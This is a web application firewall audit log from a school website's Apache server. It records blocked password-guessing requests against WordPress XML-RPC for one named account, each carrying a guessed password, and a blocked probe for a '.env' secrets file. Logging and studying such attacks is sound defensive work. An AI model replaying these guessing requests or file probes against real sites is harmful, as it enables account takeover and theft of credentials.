X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6600626d-C--
wp.getUsersBlogs
kasubagtu
kasubagtu1991
--6600626d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6600626d-E--
--6600626d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075391312586 5393 (- - -)
Stopwatch2: 1745075391312586 5393; combined=4181, p1=534, p2=3425, p3=0, p4=0, p5=129, sr=95, sw=93, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6600626d-Z--
--75348654-A--
[19/Apr/2025:22:10:54 +0700] aAO8_nNa4dA2HllpK_PGeAAAAI8 103.236.140.4 39982 103.236.140.4 8181
--75348654-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--75348654-C--
wp.getUsersBlogs
kasubagtu
trustno1
--75348654-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--75348654-E--
--75348654-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075454895108 4974 (- - -)
Stopwatch2: 1745075454895108 4974; combined=3540, p1=472, p2=2907, p3=0, p4=0, p5=96, sr=104, sw=65, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--75348654-Z--
--2081d256-A--
[19/Apr/2025:22:11:56 +0700] aAO9POvDiFC_ir7MDwYydgAAAE0 103.236.140.4 45944 103.236.140.4 8181
--2081d256-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2081d256-C--
wp.getUsersBlogs
kasubagtu
kasubagtu1989
--2081d256-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2081d256-E--
--2081d256-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075516259482 5232 (- - -)
Stopwatch2: 1745075516259482 5232; combined=3905, p1=449, p2=3252, p3=0, p4=0, p5=119, sr=85, sw=85, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2081d256-Z--
--7fa3ee2b-A--
[19/Apr/2025:22:13:02 +0700] aAO9fuvDiFC_ir7MDwYz_wAAAEc 103.236.140.4 52466 103.236.140.4 8181
--7fa3ee2b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7fa3ee2b-C--
wp.getUsersBlogs
kasubagtu
marketing
--7fa3ee2b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7fa3ee2b-E--
--7fa3ee2b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075582245959 5530 (- - -)
Stopwatch2: 1745075582245959 5530; combined=4174, p1=404, p2=3562, p3=0, p4=0, p5=121, sr=81, sw=87, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7fa3ee2b-Z--
--8a461b7a-A--
[19/Apr/2025:22:14:12 +0700] aAO9xOvDiFC_ir7MDwY1twAAAFQ 103.236.140.4 59410 103.236.140.4 8181
--8a461b7a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8a461b7a-C--
wp.getUsersBlogs
kasubagtu
martin
--8a461b7a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8a461b7a-E--
--8a461b7a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075652899142 5366 (- - -)
Stopwatch2: 1745075652899142 5366; combined=3752, p1=469, p2=3105, p3=0, p4=0, p5=104, sr=86, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8a461b7a-Z--
--48812e3d-A--
[19/Apr/2025:22:15:14 +0700] aAO-AuvDiFC_ir7MDwY3vAAAAEo 103.236.140.4 37294 103.236.140.4 8181
--48812e3d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--48812e3d-C--
wp.getUsersBlogs
kasubagtu
jessica1
--48812e3d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--48812e3d-E--
--48812e3d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (54+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075714292365 5021 (- - -)
Stopwatch2: 1745075714292365 5021; combined=3577, p1=448, p2=2910, p3=0, p4=0, p5=127, sr=98, sw=92, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--48812e3d-Z--
--ad457b64-A--
[19/Apr/2025:22:16:19 +0700] aAO-Q3Na4dA2HllpK_PNNAAAAJY 103.236.140.4 43840 103.236.140.4 8181
--ad457b64-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ad457b64-C--
wp.getUsersBlogs
kasubagtu
741852963
--ad457b64-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad457b64-E--
--ad457b64-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075779610754 4366 (- - -)
Stopwatch2: 1745075779610754 4366; combined=3132, p1=363, p2=2571, p3=0, p4=0, p5=114, sr=65, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad457b64-Z--
--a3c80635-A--
[19/Apr/2025:22:17:19 +0700] aAO-f0ruoUXZj665VUFXwgAAAMo 103.236.140.4 49978 103.236.140.4 8181
--a3c80635-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a3c80635-C--
wp.getUsersBlogs
kasubagtu
marketing2022_
--a3c80635-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a3c80635-E--
--a3c80635-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075839877656 5298 (- - -)
Stopwatch2: 1745075839877656 5298; combined=3918, p1=450, p2=3282, p3=0, p4=0, p5=109, sr=89, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a3c80635-Z--
--2289073a-A--
[19/Apr/2025:22:18:19 +0700] aAO-u0ruoUXZj665VUFYhQAAAMk 103.236.140.4 53962 103.236.140.4 8181
--2289073a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2289073a-C--
wp.getUsersBlogs
kasubagtu
marketing2023
--2289073a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2289073a-E--
--2289073a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075899507219 5039 (- - -)
Stopwatch2: 1745075899507219 5039; combined=3450, p1=418, p2=2868, p3=0, p4=0, p5=95, sr=87, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2289073a-Z--
--ba473e4c-A--
[19/Apr/2025:22:19:22 +0700] aAO--nNa4dA2HllpK_PRkgAAAJQ 103.236.140.4 57984 103.236.140.4 8181
--ba473e4c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ba473e4c-C--
wp.getUsersBlogs
kasubagtu
united
--ba473e4c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ba473e4c-E--
--ba473e4c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745075962132505 4991 (- - -)
Stopwatch2: 1745075962132505 4991; combined=3594, p1=456, p2=2921, p3=0, p4=0, p5=128, sr=96, sw=89, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ba473e4c-Z--
--72189a2f-A--
[19/Apr/2025:22:20:22 +0700] aAO_NkruoUXZj665VUFaqwAAAMI 103.236.140.4 33308 103.236.140.4 8181
--72189a2f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 235
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--72189a2f-C--
wp.getUsersBlogs
kasubagtu
smkn22-jkt_sch_id000
--72189a2f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--72189a2f-E--
--72189a2f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076022007631 3636 (- - -)
Stopwatch2: 1745076022007631 3636; combined=2459, p1=316, p2=2009, p3=0, p4=0, p5=87, sr=58, sw=47, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--72189a2f-Z--
--f8bfa313-A--
[19/Apr/2025:22:21:24 +0700] aAO_dHNa4dA2HllpK_PTBAAAAI0 103.236.140.4 36870 103.236.140.4 8181
--f8bfa313-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f8bfa313-C--
wp.getUsersBlogs
kasubagtu
2222
--f8bfa313-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f8bfa313-E--
--f8bfa313-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076084145768 5280 (- - -)
Stopwatch2: 1745076084145768 5280; combined=3807, p1=468, p2=3067, p3=0, p4=0, p5=157, sr=89, sw=115, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f8bfa313-Z--
--aecd7e5d-A--
[19/Apr/2025:22:22:24 +0700] aAO_sA6cTFSgLAHl7Po4AgAAABU 103.236.140.4 40286 103.236.140.4 8181
--aecd7e5d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--aecd7e5d-C--
wp.getUsersBlogs
kasubagtu
Webadmin
--aecd7e5d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aecd7e5d-E--
--aecd7e5d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076144965681 3822 (- - -)
Stopwatch2: 1745076144965681 3822; combined=2794, p1=395, p2=2239, p3=0, p4=0, p5=94, sr=79, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aecd7e5d-Z--
--4c40cd4e-A--
[19/Apr/2025:22:23:30 +0700] aAO_8kruoUXZj665VUFc8QAAAMI 103.236.140.4 43966 103.236.140.4 8181
--4c40cd4e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 234
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4c40cd4e-C--
wp.getUsersBlogs
kasubagtu
Administrator!@#$%^
--4c40cd4e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4c40cd4e-E--
--4c40cd4e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076210338161 5175 (- - -)
Stopwatch2: 1745076210338161 5175; combined=3751, p1=477, p2=3103, p3=0, p4=0, p5=100, sr=90, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4c40cd4e-Z--
--15291437-A--
[19/Apr/2025:22:24:31 +0700] aAPALw6cTFSgLAHl7Po5sgAAAAQ 103.236.140.4 47392 103.236.140.4 8181
--15291437-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--15291437-C--
wp.getUsersBlogs
kasubagtu
temptemp
--15291437-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--15291437-E--
--15291437-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076271090602 5530 (- - -)
Stopwatch2: 1745076271090602 5530; combined=4025, p1=452, p2=3373, p3=0, p4=0, p5=114, sr=94, sw=86, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--15291437-Z--
--529b4421-A--
[19/Apr/2025:22:25:07 +0700] aAPAU3Na4dA2HllpK_PWPQAAAJA 103.236.140.4 49506 103.236.140.4 8181
--529b4421-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.59.160.222
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.59.160.222
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: */*
--529b4421-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--529b4421-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745076307807232 666 (- - -)
